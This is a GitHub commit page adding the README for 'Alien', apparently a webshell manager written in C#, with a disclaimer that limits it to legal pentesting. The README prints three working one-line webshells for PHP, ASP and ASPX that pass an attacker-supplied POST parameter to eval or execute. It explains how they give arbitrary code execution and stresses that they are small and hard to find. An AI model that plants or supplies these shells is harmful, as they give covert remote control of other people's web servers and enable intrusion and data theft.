Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
iss4cf0ng authored Mar 3, 2023
1 parent db173bc commit 98ed9a7
Show file tree
Hide file tree
Showing 5 changed files with 46 additions and 0 deletions.
Binary file added 1.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 2.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 3.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 4.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
46 changes: 46 additions & 0 deletions README_en.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
# Alien

Website Manager

## Disclaimer
This tool only use in legal pentest, reasearch and website management\
You should take the consequence if you use in illegal purpose.

## Language
C# .NET Framework V4.8

## OneShell
OneShell is a tool use in pentesting for control the server.\
It can be very tiny and very difficult to be found.
These are the simplest oneshell.

- PHP
```<?php @eval($_POST['password']);?>```
- ASP
```<%execute(request("password"))%>```
- ASPX
```<%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>```

Also, Alien support asmx , ashx webshell

## Server Manager
- MySQL : PHP
- Access : https://github.com/malbuffer4pt/DBer
- SQL Server : ASP ASPX ASMX ASHX

## Principle
For PHP, eval() function can evaluate the string as a code.\
if eval() contains a controllable variable, then we can execute any code we like.\
Example: eval($_POST['a']);\
HTTP POST a=phpinfo();\
The the server will execute code "phpinfo();"

## Screenshot

![1](https://github.com/malbuffer4pt/WebBus/blob/main/1.png)
![2](https://github.com/malbuffer4pt/WebBus/blob/main/2.png)
![3](https://github.com/malbuffer4pt/WebBus/blob/main/3.png)
![4](https://github.com/malbuffer4pt/WebBus/blob/main/4.png)

## Acknowledgements
Every veteran who study in webshell.

0 comments on commit 98ed9a7

Please sign in to comment.